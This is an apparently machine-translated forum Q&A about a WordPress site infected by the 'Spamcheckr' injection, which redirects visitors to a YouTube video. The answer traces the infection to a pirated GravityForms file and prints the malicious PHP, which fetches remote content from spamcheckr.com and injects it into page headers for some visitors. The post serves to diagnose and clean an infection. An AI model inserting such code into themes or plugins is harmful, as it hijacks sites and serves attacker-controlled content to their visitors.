我在这里发现了一些关于wordpress网站被Spamcheckr代码感染并链接到视频的帖子 - 这里有一个案例 - WordPress blog infected with HTML Refresh meta tag
我有同样的事情,但我的主题是在一个名为settings_class.php
的文件中我已经删除了settings_class.php文件,因为它主要被注释掉了,并且发现它在我的主题functions.php文件中被链接。所以我删除了这一行,仍然有问题。
我删除了我的缓存,并在我的网站上搜索了Spamcheck,现在没有链接,但它仍然链接到这个Justin B视频 - http:// www.youtube.com/watch?v=RFngSCaY5nA
这是随机的,但如果对我来说,当我访问此页面时会发生这种情况 - http://www.ginirigs.net/product/15mm-rail-clamp/
如果你能提供帮助,请告诉我。
答案 0 :(得分:0)
在我的网站上遇到同样的问题,在一个朋友发给我的GravityForms 1.8.4副本中的includes / settings.php中找到了它。对于那些刚接触FileSeek的人来说,改变一些高级设置有助于我成功搜索。 "将查询与整个文件匹配","搜索子文件夹"选中,"使用文件处理程序处理文件内容"选中,"显示与查询文本匹配的文件名"检查。 Adv选项卡上的其他所有内容都已关闭。在搜索了整个插件和主题文件夹之后,几乎立即得到了我的结果。
这里是我找到的代码,与上述链接相同(为了便于阅读,从单行格式扩展而来)。
<?php
if (!isset($_COOKIE['wordpress_test_cookie'])){
if (mt_rand(1,20) == 1) {
function secqc2_cahesk(){
if(function_exists('curl_init')){
$addressd = "http://spamcheckr.com/l.php";
$ch = curl_init();
$timeout = 5;
url_setopt($ch,CURLOPT_URL,$addressd);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
}
add_action('wp_head','secqc2_cahesk');
}
}
?>